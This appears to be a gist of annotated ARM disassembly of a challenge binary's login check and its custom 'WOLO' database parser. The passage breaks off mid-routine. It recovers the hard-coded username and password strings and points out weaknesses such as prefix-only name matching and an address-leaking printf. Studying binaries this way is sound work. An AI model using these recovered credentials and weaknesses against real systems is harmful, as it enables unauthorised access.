
@ebeip90
Created September 21, 2014 06:38
__text:00000C30 ; =============== S U B R O U T I N E =======================================
__text:00000C30
__text:00000C30
; int _check_login(db *pDATABASE, uint32 TOTAL_DATA_SIZE)
; Walks every row of the database and returns 1 as soon as a row has
; USERNAME == "captainfalcon", PASSWORD == "fc03329505475dd4be51627cc7f0b1f1",
; ADMIN == 1 and ISAWESOME == 1; returns 0 when a column type is unknown or
; when the rows are exhausted. No header or bounds validation happens here,
; so this presumably runs only after _validate_database accepted the buffer.
; The expected username and password are literal strings in the binary, i.e.
; hard-coded credentials: anyone holding the binary can read them back.
__text:00000C30 EXPORT _check_login
__text:00000C30 _check_login
__text:00000C30
; Frame slots, relative to the 0x6C frame base. arg_0 is a second copy of
; pDATABASE (stored at C42 below), not a stack-passed argument.
__text:00000C30 STACKARG0 = -0x6C
__text:00000C30 var_68 = -0x68
__text:00000C30 var_64 = -0x64
__text:00000C30 var_60 = -0x60
__text:00000C30 var_5C = -0x5C
__text:00000C30 var_58 = -0x58
__text:00000C30 var_54 = -0x54
__text:00000C30 var_50 = -0x50
__text:00000C30 COLUMN_ID = -0x4C
__text:00000C30 FOUND_ISAWESOME = -0x48
__text:00000C30 FOUND_ADMIN = -0x44
__text:00000C30 FOUND_PASSWORD = -0x40
__text:00000C30 FOUND_CAPTAINFALCON = -0x3C
__text:00000C30 pCURRENT_ROWCOL_ = -0x38
__text:00000C30 END_OF_DATA = -0x34
__text:00000C30 COLUMNSIZE = -0x30
__text:00000C30 COLUMN_IDX = -0x2C
__text:00000C30 pCURRENT_ROWCOL = -0x28
__text:00000C30 COLUMNSIZE_CUMULATIVE = -0x24
__text:00000C30 pROW_DATA = -0x20
__text:00000C30 pCOLUMN_DATA = -0x1C
__text:00000C30 arg_0 = -0x18
__text:00000C30 TOTAL_DATA_SIZE??? = -0x14
__text:00000C30 pDATABASE = -0x10
__text:00000C30 var_C = -0xC
__text:00000C30
__text:00000C30 PUSH {R7,LR}
__text:00000C32 MOV R7, SP
__text:00000C34 SUB SP, SP, #0x64
; Initialize & Save (R0 = pDATABASE, R1 = TOTAL_DATA_SIZE)
__text:00000C36 MOVS R2, #0
__text:00000C3C STR R0, [SP,#0x6C+pDATABASE]
__text:00000C3E STR R1, [SP,#0x6C+TOTAL_DATA_SIZE???]
__text:00000C40 LDR R0, [SP,#0x6C+pDATABASE]
__text:00000C42 STR R0, [SP,#0x6C+arg_0]
; pCOLUMNS = DATABASE + sizeof COLUMNHEADER
; (header is 0xC bytes; NUM_COLUMNS is the uint16 at offset 8)
__text:00000C44 LDR R0, [SP,#0x6C+pDATABASE]
__text:00000C46 ADDS R0, #0xC ;; arg0 + C
__text:00000C48 STR R0, [SP,#0x6C+pCOLUMN_DATA]
; pROWS = DATABASE + sizeof COLUMNHEADER + (DATABASE->COLUMNS * sizeof COLUMN)
; (arg0+C + [arg0+8]*17)
; a column record is 0x11 bytes: 1 type byte followed by a 16-byte name
__text:00000C4A LDR R0, [SP,#0x6C+pDATABASE]
__text:00000C4C ADDS R0, #0xC
__text:00000C4E STR R0, [SP,#0x6C+pROW_DATA]
__text:00000C50 LDR R0, [SP,#0x6C+arg_0]
__text:00000C52 LDRH R0, [R0,#8] ; [r0+8]
__text:00000C54 MOVS R1, #0x11 ; 17
__text:00000C5A MULS R0, R1 ; (arg0+8)*17
__text:00000C5C LDR R1, [SP,#0x6C+pROW_DATA] ; arg0+C
__text:00000C5E ADD R0, R1 ;
__text:00000C60 STR R0, [SP,#0x6C+pROW_DATA]
__text:00000C62 STR R2, [SP,#0x6C+COLUMNSIZE_CUMULATIVE]
__text:00000C64 LDR R0, [SP,#0x6C+pDATABASE]
__text:00000C66 ADDS R0, #0xC
__text:00000C68 STR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000C6A STR R2, [SP,#0x6C+COLUMN_IDX]
;========> LOOP over the column table: sums the field widths into
; COLUMNSIZE_CUMULATIVE, which becomes the row stride used at F0A
__text:00000C6C
__text:00000C6C loc_C6C ; CODE XREF: _check_login+72j
; if COLUMN_IDX >= DATABASE.NUM_COLUMNS (CMP + BCS is an unsigned >=)
; break
__text:00000C6C LDR R0, [SP,#0x6C+COLUMN_IDX]
__text:00000C6E LDR R1, [SP,#0x6C+arg_0]
__text:00000C70 LDRH R1, [R1,#8]
__text:00000C72 CMP R0, R1
__text:00000C74 BCS loc_CA4
; GET COLUMN SIZE
; NOTE(review): the callee reads _col_size4 here but _col_size everywhere
; else; presumably the same routine (transcription artifact) - confirm.
__text:00000C76 LDR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000C78 BL _col_size4
__text:00000C7C STR R0, [SP,#0x6C+COLUMNSIZE]
; IF COLUMN_SIZE == 0: EXIT (return 0; _col_size reports 0 for a type byte > 7)
__text:00000C7E LDR R0, [SP,#0x6C+COLUMNSIZE]
__text:00000C80 CMP R0, #0
__text:00000C82 BNE loc_C8E
__text:00000C84 MOVS R0, #0
__text:00000C8A STR R0, [SP,#0x6C+var_C]
__text:00000C8C B loc_EXIT
__text:00000C8E loc_C8E ; CODE XREF: _check_login+52j
__text:00000C8E LDR R0, [SP,#0x6C+COLUMNSIZE]
__text:00000C90 LDR R1, [SP,#0x6C+COLUMNSIZE_CUMULATIVE]
__text:00000C92 ADD R0, R1
__text:00000C94 STR R0, [SP,#0x6C+COLUMNSIZE_CUMULATIVE]
__text:00000C96 LDR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000C98 ADDS R0, #0x11
__text:00000C9A STR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000C9C LDR R0, [SP,#0x6C+COLUMN_IDX]
__text:00000C9E ADDS R0, #1
__text:00000CA0 STR R0, [SP,#0x6C+COLUMN_IDX]
__text:00000CA2 B loc_C6C
;<======== LOOP
; END_OF_DATA = pDATABASE + TOTAL_DATA_SIZE
__text:00000CA4 loc_CA4 ; CODE XREF: _check_login+44j
__text:00000CA4 LDR R0, [SP,#0x6C+pROW_DATA]
__text:00000CA6 STR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000CA8 LDR R0, [SP,#0x6C+pDATABASE]
__text:00000CAA LDR R1, [SP,#0x6C+TOTAL_DATA_SIZE???]
__text:00000CAC ADD R0, R1
__text:00000CAE STR R0, [SP,#0x6C+END_OF_DATA]
__text:00000CB0
; ROW LOOP: if pCURRENT_ROWCOL >= END_OF_DATA: EXIT (return 0)
; Only the row's start address is checked; the field reads below may reach
; up to COLUMNSIZE_CUMULATIVE bytes past it, so this relies on the caller
; having validated TOTAL_DATA_SIZE against rows * stride (as
; _validate_database does) rather than on this check alone.
__text:00000CB0 loc_CB0 ; CODE XREF: _check_login+2E2j
__text:00000CB0 LDR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000CB2 LDR R1, [SP,#0x6C+END_OF_DATA]
__text:00000CB4 CMP R0, R1
__text:00000CB6 BCS.W loc_EXIT2
; reset the per-row match flags; pCURRENT_ROWCOL_ walks the fields of this row
__text:00000CBA MOVS R0, #0
__text:00000CC0 LDR R1, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000CC2 STR R1, [SP,#0x6C+pCURRENT_ROWCOL_]
__text:00000CC4 STR R0, [SP,#0x6C+FOUND_CAPTAINFALCON]
__text:00000CC6 STR R0, [SP,#0x6C+FOUND_PASSWORD]
__text:00000CC8 STR R0, [SP,#0x6C+FOUND_ADMIN]
__text:00000CCA STR R0, [SP,#0x6C+FOUND_ISAWESOME]
__text:00000CCC STR R0, [SP,#0x6C+COLUMN_ID]
__text:00000CCE
; COLUMN LOOP: if COLUMN_ID >= DATABASE.NUM_COLUMNS -> all fields seen
__text:00000CCE loc_CCE ; CODE XREF: _check_login+296j
__text:00000CCE LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000CD0 LDR R1, [SP,#0x6C+arg_0]
__text:00000CD2 LDRH R1, [R1,#8]
__text:00000CD4 CMP R0, R1
__text:00000CD6 BCS.W log_USERNAMEPASS
; r2 = 8 (strlen 'USERNAME')
; r1 = 'USERNAME'
; r0 = pCOLUMN_DATA[COLUMN_ID].String (name starts at byte 1 of the record)
; STRCMP - only 8 of the 16 name bytes are compared, so any column name
; that merely starts with "USERNAME" also matches (same for the other names)
__text:00000CDA MOV R1, #(aUsername - 0xCE6) ; "USERNAME"
__text:00000CE2 ADD R1, PC ; "USERNAME"
__text:00000CE4 MOVS R2, #8 ; size_t
__text:00000CEA LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000CEC LDR R3, [SP,#0x6C+pCOLUMN_DATA]
__text:00000CEE MOV R9, #0x11
__text:00000CF6 MUL.W R0, R0, R9
__text:00000CFA ADD R0, R3
__text:00000CFC ADDS R0, #1 ; char *
__text:00000CFE BLX _strncmp
__text:00000D02 CMP R0, #0
__text:00000D04 BNE loc_D3E
; byte 0 of the column record is the type; must be 5 = 16-byte string (see _col_size)
__text:00000D06 LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000D08 LDR R1, [SP,#0x6C+pCOLUMN_DATA]
__text:00000D0A MOVS R2, #0x11
__text:00000D10 MULS R0, R2
__text:00000D12 ADD R0, R1
__text:00000D14 LDRB R0, [R0]
__text:00000D16 CMP R0, #5
__text:00000D18 BNE loc_D3E
; strncmp("captainfalcon", pCURRENT_ROWCOL_, 0xE): 14 bytes = the 13 chars plus
; the terminating NUL, so the 16-byte field must hold exactly that string
__text:00000D1A MOV R1, #(aCaptainfalcon - 0xD26) ; "captainfalcon"
__text:00000D22 ADD R1, PC ; "captainfalcon"
__text:00000D24 MOVS R2, #0xE ; size_t
__text:00000D2A LDR R0, [SP,#0x6C+pCURRENT_ROWCOL_] ; char *
__text:00000D2C BLX _strncmp
__text:00000D30 CMP R0, #0
__text:00000D32 BNE loc_D3C
__text:00000D34 MOVS R0, #1
__text:00000D3A STR R0, [SP,#0x6C+FOUND_CAPTAINFALCON]
__text:00000D3C
__text:00000D3C loc_D3C ; CODE XREF: _check_login+102j
__text:00000D3C B loc_D3E
; If column is 'PASSWORD'
__text:00000D3E loc_D3E ; CODE XREF: _check_login+D4j
__text:00000D3E ; _check_login+E8j ...
__text:00000D3E MOV R1, #(aPassword - 0xD4A) ; "PASSWORD"
__text:00000D46 ADD R1, PC ; "PASSWORD"
__text:00000D48 MOVS R2, #8 ; size_t
__text:00000D4E LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000D50 LDR R3, [SP,#0x6C+pCOLUMN_DATA]
__text:00000D52 MOV R9, #0x11
__text:00000D5A MUL.W R0, R0, R9
__text:00000D5E ADD R0, R3
__text:00000D60 ADDS R0, #1 ; char *
__text:00000D62 BLX _strncmp
__text:00000D66 CMP R0, #0
__text:00000D68 BNE loc_DA2
; column type must be 6 = 32-byte string (see _col_size)
__text:00000D6A LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000D6C LDR R1, [SP,#0x6C+pCOLUMN_DATA]
__text:00000D6E MOVS R2, #0x11
__text:00000D74 MULS R0, R2
__text:00000D76 ADD R0, R1
__text:00000D78 LDRB R0, [R0]
__text:00000D7A CMP R0, #6
__text:00000D7C BNE loc_DA2
; strncmp('fc03329505475dd4be51627cc7f0b1f1', pCURRENT_ROWCOL_, 0x20): the full
; 32-byte field is compared. strncmp stops at the first differing byte, so the
; comparison is not constant-time - a cleartext credential check in any case.
__text:00000D7E MOV R1, #(aFc03329505475d - 0xD8A) ; "fc03329505475dd4be51627cc7f0b1f1"
__text:00000D86 ADD R1, PC ; "fc03329505475dd4be51627cc7f0b1f1"
__text:00000D88 MOVS R2, #0x20 ; ' ' ; size_t
__text:00000D8E LDR R0, [SP,#0x6C+pCURRENT_ROWCOL_] ; char *
__text:00000D90 BLX _strncmp
__text:00000D94 CMP R0, #0
__text:00000D96 BNE loc_DA0
__text:00000D98 MOVS R0, #1
__text:00000D9E STR R0, [SP,#0x6C+FOUND_PASSWORD]
__text:00000DA0
__text:00000DA0 loc_DA0 ; CODE XREF: _check_login+166j
__text:00000DA0 B loc_DA2
; column is "ADMIN"
__text:00000DA2 loc_DA2 ; CODE XREF: _check_login+138j
__text:00000DA2 ; _check_login+14Cj ...
__text:00000DA2 MOV R1, #(aAdmin - 0xDAE) ; "ADMIN"
__text:00000DAA ADD R1, PC ; "ADMIN"
__text:00000DAC MOVS R2, #5 ; size_t
__text:00000DB2 LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000DB4 LDR R3, [SP,#0x6C+pCOLUMN_DATA]
__text:00000DB6 MOV R9, #0x11
__text:00000DBE MUL.W R0, R0, R9
__text:00000DC2 ADD R0, R3
__text:00000DC4 ADDS R0, #1 ; char *
__text:00000DC6 BLX _strncmp
__text:00000DCA CMP R0, #0
__text:00000DCC BNE loc_E0C
; column type must be 0 = 8-bit integer
__text:00000DCE LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000DD0 LDR R1, [SP,#0x6C+pCOLUMN_DATA]
__text:00000DD2 MOVS R2, #0x11
__text:00000DD8 MULS R0, R2
__text:00000DDA ADD R0, R1
__text:00000DDC LDRB R0, [R0]
__text:00000DDE CMP R0, #0
__text:00000DE0 BNE loc_E0C
; ADMIN field: FOUND_ADMIN = 1 only when the byte equals exactly 1
__text:00000DE2 LDR R0, [SP,#0x6C+pCURRENT_ROWCOL_]
__text:00000DE4 LDRB R0, [R0]
__text:00000DE6 STRB.W R0, [SP,#0x6C+var_50]
__text:00000DEA LDRB.W R0, [SP,#0x6C+var_50]
__text:00000DEE CMP R0, #1
__text:00000DF0 BNE loc_DFA
__text:00000DF2 MOVS R0, #1
__text:00000DF8 STR R0, [SP,#0x6C+FOUND_ADMINs] ; sic: presumably the FOUND_ADMIN slot (-0x44), read back at E04
__text:00000DFA
; printf("%u\n", FOUND_ADMIN) - emitted whether or not the byte was 1
__text:00000DFA loc_DFA ; CODE XREF: _check_login+1C0j
__text:00000DFA MOV R0, #(aU - 0xE06) ; "%u\n"
__text:00000E02 ADD R0, PC ; "%u\n"
__text:00000E04 LDR R1, [SP,#0x6C+FOUND_ADMIN]
__text:00000E06 BLX _printf
__text:00000E0A STR R0, [SP,#0x6C+var_58]
__text:00000E0C
; Next column is ISAWESOME
__text:00000E0C loc_E0C ; CODE XREF: _check_login+19Cj
__text:00000E0C ; _check_login+1B0j
__text:00000E0C MOV R1, #(aIsawesome - 0xE18) ; "ISAWESOME"
__text:00000E14 ADD R1, PC ; "ISAWESOME"
__text:00000E16 MOVS R2, #9 ; size_t
__text:00000E1C LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000E1E LDR R3, [SP,#0x6C+pCOLUMN_DATA]
__text:00000E20 MOV R9, #0x11
__text:00000E28 MUL.W R0, R0, R9
__text:00000E2C ADD R0, R3
__text:00000E2E ADDS R0, #1 ; char *
__text:00000E30 BLX _strncmp
__text:00000E34 CMP R0, #0
__text:00000E36 BNE loc_E68
; Field type is uint8 (type 0)
__text:00000E38 LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000E3A LDR R1, [SP,#0x6C+pCOLUMN_DATA]
__text:00000E3C MOVS R2, #0x11
__text:00000E42 MULS R0, R2
__text:00000E44 ADD R0, R1
__text:00000E46 LDRB R0, [R0]
__text:00000E48 CMP R0, #0
__text:00000E4A BNE loc_E68
; Value is 1: FOUND_ISAWESOME = (byte == 1), written unconditionally (IT EQ)
__text:00000E4C LDR R0, [SP,#0x6C+pCURRENT_ROWCOL_]
__text:00000E4E LDRB R0, [R0]
__text:00000E50 STRB.W R0, [SP,#0x6C+var_54]
__text:00000E54 LDRB.W R0, [SP,#0x6C+var_54]
__text:00000E58 CMP R0, #1
__text:00000E5A MOVW R0, #0
__text:00000E5E IT EQ
__text:00000E60 MOVEQ R0, #1
__text:00000E62 AND.W R0, R0, #1
__text:00000E66 STR R0, [SP,#0x6C+FOUND_ISAWESOME]
__text:00000E68
; After every column: printf("%.16s %u\t%p\n", column name, _col_size(column),
; pCURRENT_ROWCOL_). The %p argument is the address of the field inside the
; database buffer; if stdout reaches the client this discloses a server-side
; memory address. Then advance pCURRENT_ROWCOL_ by the field width.
__text:00000E68 loc_E68 ; CODE XREF: _check_login+206j
__text:00000E68 ; _check_login+21Aj
__text:00000E68 LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000E6A LDR R1, [SP,#0x6C+pCOLUMN_DATA]
__text:00000E6C MOVS R2, #0x11
__text:00000E72 MULS R0, R2
__text:00000E74 ADD R0, R1
__text:00000E76 ADDS R1, R0, #1
__text:00000E78 LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000E7A LDR R2, [SP,#0x6C+pCOLUMN_DATA]
__text:00000E7C MOVS R3, #0x11
__text:00000E82 MULS R0, R3
__text:00000E84 ADD R0, R2
__text:00000E86 STR R1, [SP,#0x6C+var_5C]
__text:00000E88 BL _col_size
__text:00000E8C MOV R1, #(a_16sUP - 0xE98) ; "%.16s %u\t%p\n"
__text:00000E94 ADD R1, PC ; "%.16s %u\t%p\n"
__text:00000E96 LDR R3, [SP,#0x6C+pCURRENT_ROWCOL_]
__text:00000E98 STR R0, [SP,#0x6C+var_60]
__text:00000E9A MOV R0, R1 ; char *
__text:00000E9C LDR R1, [SP,#0x6C+var_5C]
__text:00000E9E LDR R2, [SP,#0x6C+var_60]
__text:00000EA0 BLX _printf
__text:00000EA4 LDR R1, [SP,#0x6C+COLUMN_ID]
__text:00000EA6 LDR R2, [SP,#0x6C+pCOLUMN_DATA]
__text:00000EA8 MOVS R3, #0x11
__text:00000EAE MULS R1, R3
__text:00000EB0 ADD R1, R2
__text:00000EB2 STR R0, [SP,#0x6C+var_64]
__text:00000EB4 MOV R0, R1
__text:00000EB6 BL _col_size
__text:00000EBA LDR R1, [SP,#0x6C+pCURRENT_ROWCOL_]
__text:00000EBC ADD R0, R1
__text:00000EBE STR R0, [SP,#0x6C+pCURRENT_ROWCOL_]
__text:00000EC0 LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000EC2 ADDS R0, #1
__text:00000EC4 STR R0, [SP,#0x6C+COLUMN_ID]
__text:00000EC6 B loc_CCE
; Executed after all columns inspected: print the four flags, then
; return 1 only if all of them are non-zero, else move to the next row
__text:00000EC8 log_USERNAMEPASS ; CODE XREF: _check_login+A6j
__text:00000EC8 MOV R0, #(aUsernameUPassw - 0xED4) ; "username: %u\tpassword: %u\tadmin: %u\t"...
__text:00000ED0 ADD R0, PC ; "username: %u\tpassword: %u\tadmin: %u\t"...
__text:00000ED2 LDR R1, [SP,#0x6C+FOUND_CAPTAINFALCON]
__text:00000ED4 LDR R2, [SP,#0x6C+FOUND_PASSWORD]
__text:00000ED6 LDR R3, [SP,#0x6C+FOUND_ADMIN]
__text:00000ED8 LDR.W R9, [SP,#0x6C+FOUND_ISAWESOME]
__text:00000EDC STR.W R9, [SP,#0x6C+STACKARG0] ; 5th printf argument goes on the stack
__text:00000EE0 BLX _printf
__text:00000EE4 LDR R1, [SP,#0x6C+FOUND_CAPTAINFALCON]
__text:00000EE6 CMP R1, #0
__text:00000EE8 STR R0, [SP,#0x6C+var_68]
__text:00000EEA BEQ loc_F08
__text:00000EEC LDR R0, [SP,#0x6C+FOUND_PASSWORD]
__text:00000EEE CMP R0, #0
__text:00000EF0 BEQ loc_F08
__text:00000EF2 LDR R0, [SP,#0x6C+FOUND_ADMIN]
__text:00000EF4 CMP R0, #0
__text:00000EF6 BEQ loc_F08
__text:00000EF8 LDR R0, [SP,#0x6C+FOUND_ISAWESOME]
__text:00000EFA CMP R0, #0
__text:00000EFC BEQ loc_F08
__text:00000EFE MOVS R0, #1
__text:00000F04 STR R0, [SP,#0x6C+var_C]
__text:00000F06 B loc_EXIT
__text:00000F08 loc_F08 ; CODE XREF: _check_login+2BAj
__text:00000F08 ; _check_login+2C0j ...
__text:00000F08 B loc_F0A
; next row: pCURRENT_ROWCOL += COLUMNSIZE_CUMULATIVE (the row stride)
__text:00000F0A loc_F0A ; CODE XREF: _check_login:loc_F08j
__text:00000F0A LDR R0, [SP,#0x6C+COLUMNSIZE_CUMULATIVE]
__text:00000F0C LDR R1, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000F0E ADD R0, R1
__text:00000F10 STR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000F12 B loc_CB0
; rows exhausted without a full match -> return 0
__text:00000F14 loc_EXIT2 ; CODE XREF: _check_login+86j
__text:00000F14 MOVS R0, #0
__text:00000F1A STR R0, [SP,#0x6C+var_C]
__text:00000F1C
; common exit: return var_C
__text:00000F1C loc_EXIT ; CODE XREF: _check_login+5Cj
__text:00000F1C ; _check_login+2D6j
__text:00000F1C LDR R0, [SP,#0x6C+var_C]
__text:00000F1E ADD SP, SP, #0x64
__text:00000F20 POP {R7,PC}
__text:00000F20 ; End of function _check_login
__text:00000F20
__text:00000F20 ; __text ends
__text:00000F20
Retrieves the size of a column.
/*
* Column types:
* * 0 = 8bit integer
* * 1 = 16bit integer
* * 2 = 32bit integer
* * 3 = 64bit integer
* * 4 = 8byte string
* * 5 = 16byte string
* * 6 = 32byte string
* * 7 = unix timestamp encoded as a 32bit integer
*
*/
__text:00000A80 ; =============== S U B R O U T I N E =======================================
__text:00000A80
__text:00000A80
; uint32 _col_size(column *c)
; Returns the field width in bytes for the column's type byte c[0]:
; 0->1, 1->2, 2->4, 3->8, 4->8, 5->0x10, 6->0x20, 7->4.
; Any type byte above 7 yields 0, which both callers treat as "reject".
__text:00000A80 EXPORT _col_size
__text:00000A80 _col_size ; CODE XREF: _validate_database+DEp
__text:00000A80 ; _check_login+48p ...
__text:00000A80
__text:00000A80 var_C = -0xC
__text:00000A80 var_8 = -8
__text:00000A80 var_4 = -4
__text:00000A80
__text:00000A80 SUB SP, SP, #0xC
__text:00000A82 STR R0, [SP,#0xC+var_8]
__text:00000A84 LDRB R0, [R0]
; unsigned compare: BHI rejects any type byte > 7 before it can index the
; 8-entry jump table, so an attacker-chosen type cannot escape the table
__text:00000A86 CMP R0, #7
__text:00000A88 STR R0, [SP,#0xC+var_C]
__text:00000A8A BHI loc_AEA
__text:00000A8C LDR R1, [SP,#0xC+var_C]
__text:00000A8E TBB.W [PC,R1] ; switch 8 cases
__text:00000A8E ; ---------------------------------------------------------------------------
__text:00000A92 jpt_A8E DCB 4 ; jump table for switch statement
__text:00000A93 DCB 9
__text:00000A94 DCB 0xE
__text:00000A95 DCB 0x13
__text:00000A96 DCB 0x18
__text:00000A97 DCB 0x1D
__text:00000A98 DCB 0x22
__text:00000A99 DCB 0x27
__text:00000A9A ; ---------------------------------------------------------------------------
__text:00000A9A
__text:00000A9A loc_A9A ; CODE XREF: _col_size+Ej
__text:00000A9A MOVS R0, #1 ; jumptable 00000A8E case 0 ; 8-bit integer
__text:00000AA0 STR R0, [SP,#0xC+var_4]
__text:00000AA2 B loc_AF2
__text:00000AA4 ; ---------------------------------------------------------------------------
__text:00000AA4
__text:00000AA4 loc_AA4 ; CODE XREF: _col_size+Ej
__text:00000AA4 MOVS R0, #2 ; jumptable 00000A8E case 1 ; 16-bit integer
__text:00000AAA STR R0, [SP,#0xC+var_4]
__text:00000AAC B loc_AF2
__text:00000AAE ; ---------------------------------------------------------------------------
__text:00000AAE
__text:00000AAE loc_AAE ; CODE XREF: _col_size+Ej
__text:00000AAE MOVS R0, #4 ; jumptable 00000A8E case 2 ; 32-bit integer
__text:00000AB4 STR R0, [SP,#0xC+var_4]
__text:00000AB6 B loc_AF2
__text:00000AB8 ; ---------------------------------------------------------------------------
__text:00000AB8
__text:00000AB8 loc_AB8 ; CODE XREF: _col_size+Ej
__text:00000AB8 MOVS R0, #8 ; jumptable 00000A8E case 3 ; 64-bit integer
__text:00000ABE STR R0, [SP,#0xC+var_4]
__text:00000AC0 B loc_AF2
__text:00000AC2 ; ---------------------------------------------------------------------------
__text:00000AC2
__text:00000AC2 loc_AC2 ; CODE XREF: _col_size+Ej
__text:00000AC2 MOVS R0, #8 ; jumptable 00000A8E case 4 ; 8-byte string
__text:00000AC8 STR R0, [SP,#0xC+var_4]
__text:00000ACA B loc_AF2
__text:00000ACC ; ---------------------------------------------------------------------------
__text:00000ACC
__text:00000ACC loc_ACC ; CODE XREF: _col_size+Ej
__text:00000ACC MOVS R0, #0x10 ; jumptable 00000A8E case 5 ; 16-byte string
__text:00000AD2 STR R0, [SP,#0xC+var_4]
__text:00000AD4 B loc_AF2
__text:00000AD6 ; ---------------------------------------------------------------------------
__text:00000AD6
__text:00000AD6 loc_AD6 ; CODE XREF: _col_size+Ej
__text:00000AD6 MOVS R0, #0x20 ; ' ' ; jumptable 00000A8E case 6 ; 32-byte string
__text:00000ADC STR R0, [SP,#0xC+var_4]
__text:00000ADE B loc_AF2
__text:00000AE0 ; ---------------------------------------------------------------------------
__text:00000AE0
__text:00000AE0 loc_AE0 ; CODE XREF: _col_size+Ej
__text:00000AE0 MOVS R0, #4 ; jumptable 00000A8E case 7 ; timestamp as a 32-bit integer
__text:00000AE6 STR R0, [SP,#0xC+var_4]
__text:00000AE8 B loc_AF2
__text:00000AEA ; ---------------------------------------------------------------------------
__text:00000AEA
; default: unknown type -> 0 (callers reject the database)
__text:00000AEA loc_AEA ; CODE XREF: _col_size+Aj
__text:00000AEA MOVS R0, #0
__text:00000AF0 STR R0, [SP,#0xC+var_4]
__text:00000AF2
__text:00000AF2 loc_AF2 ; CODE XREF: _col_size+22j
__text:00000AF2 ; _col_size+2Cj ...
__text:00000AF2 LDR R0, [SP,#0xC+var_4]
__text:00000AF4 ADD SP, SP, #0xC
__text:00000AF6 BX LR
__text:00000AF6 ; End of function _col_size
__text:00000AF6
__text:00000AF8
__text:00000AF8 ; =============== S U B R O U T I N E =======================================
__text:00000AF8
__text:00000AF8
; int _validate_database(db *P_DATABASE, uint32 BUFFERSIZE)
; Returns 1 if the buffer holds a well-formed database, 0 otherwise:
; header fits, magic 'WOLO', version 1, 4 <= rows <= 0x1000,
; 4 <= columns <= 0x10, every column type known to _col_size, and
; 12 + columns*0x11 + rows*(sum of column widths) <= BUFFERSIZE.
; Each region is size-checked against BUFFERSIZE before it is read:
; the header before the magic load at B2A, the column table before the
; type bytes are fed to _col_size at BD6. Row contents are never read here.
__text:00000AF8 EXPORT _validate_database
__text:00000AF8 _validate_database
__text:00000AF8
__text:00000AF8 COLUMN_SIZE = -0x2C
__text:00000AF8 COLUMN_NUMBER = -0x28
__text:00000AF8 COLUMN_DATA = -0x24
__text:00000AF8 COLUMNSIZE_CUMULATIVE = -0x20
__text:00000AF8 TOTAL_BYTES = -0x1C
__text:00000AF8 P_DATABASE = -0x18
__text:00000AF8 ARG1_BUFFERSIZE = -0x14
__text:00000AF8 SAVED_ARG0 = -0x10
__text:00000AF8 var_C = -0xC
__text:00000AF8
__text:00000AF8 PUSH {R7,LR}
__text:00000AFA MOV R7, SP
__text:00000AFC SUB SP, SP, #0x24
; TOTAL_BYTES starts at 0xC = sizeof(header)
__text:00000AFE MOVS R2, #0xC
__text:00000B04 STR R0, [SP,#0x2C+SAVED_ARG0]
__text:00000B06 STR R1, [SP,#0x2C+ARG1_BUFFERSIZE]
__text:00000B08 LDR R0, [SP,#0x2C+SAVED_ARG0]
__text:00000B0A STR R0, [SP,#0x2C+P_DATABASE]
__text:00000B0C STR R2, [SP,#0x2C+TOTAL_BYTES]
__text:00000B0E LDR R0, [SP,#0x2C+ARG1_BUFFERSIZE]
__text:00000B10 LDR R1, [SP,#0x2C+TOTAL_BYTES]
BUFFERSIZE < SIZEOF COLUMN?
OR EXIT
; (unsigned: BCS = BUFFERSIZE >= 0xC, i.e. the header fits before any header field is read)
__text:00000B12 CMP R0, R1
__text:00000B14 BCS loc_B20
__text:00000B16 MOVS R0, #0
__text:00000B1C STR R0, [SP,#0x2C+var_C]
__text:00000B1E B loc_EXIT
MAGIC
WORD [database] == 'WOLO'
OR EXIT
__text:00000B20 loc_B20 ; CODE XREF: _validate_database+1Cj
__text:00000B20 MOV R0, #0x4F4C4F57 ; WOLO
__text:00000B28 LDR R1, [SP,#0x2C+P_DATABASE]
__text:00000B2A LDR R1, [R1]
__text:00000B2C CMP R1, R0
__text:00000B2E BEQ loc_B3A
__text:00000B30 MOVS R0, #0
__text:00000B36 STR R0, [SP,#0x2C+var_C]
__text:00000B38 B loc_EXIT
VERSION
WORD [database+4] == 1?
OR EXIT
__text:00000B3A loc_B3A ; CODE XREF: _validate_database+36j
__text:00000B3A LDR R0, [SP,#0x2C+P_DATABASE]
__text:00000B3C LDR R0, [R0,#4]
__text:00000B3E CMP R0, #1
__text:00000B40 BEQ loc_B4C
__text:00000B42 MOVS R0, #0
__text:00000B48 STR R0, [SP,#0x2C+var_C]
__text:00000B4A B loc_EXIT
ROWS
USHORT [database+0xA] >= 4
OR EXIT
; BGE/BLE below are signed compares, but LDRH zero-extends so the value is
; always 0..0xFFFF and the signedness is harmless
__text:00000B4C loc_B4C ; CODE XREF: _validate_database+48j
__text:00000B4C LDR R0, [SP,#0x2C+P_DATABASE]
__text:00000B4E LDRH R0, [R0,#0xA]
__text:00000B50 CMP R0, #4
__text:00000B52 BGE loc_B5E
__text:00000B54 MOVS R0, #0
__text:00000B5A STR R0, [SP,#0x2C+var_C]
__text:00000B5C B loc_EXIT
ROWS
USHORT [database+0xA] <= 0x1000
OR EXIT
__text:00000B5E loc_B5E ; CODE XREF: _validate_database+5Aj
__text:00000B5E LDR R0, [SP,#0x2C+P_DATABASE]
__text:00000B60 LDRH R0, [R0,#0xA]
__text:00000B62 CMP.W R0, #0x1000
__text:00000B66 BLE loc_B72
__text:00000B68 MOVS R0, #0
__text:00000B6E STR R0, [SP,#0x2C+var_C]
__text:00000B70 B loc_EXIT
COLUMNS
USHORT [database+8] > 4
OR EXIT
; (BGE: NUM_COLUMNS >= 4 passes)
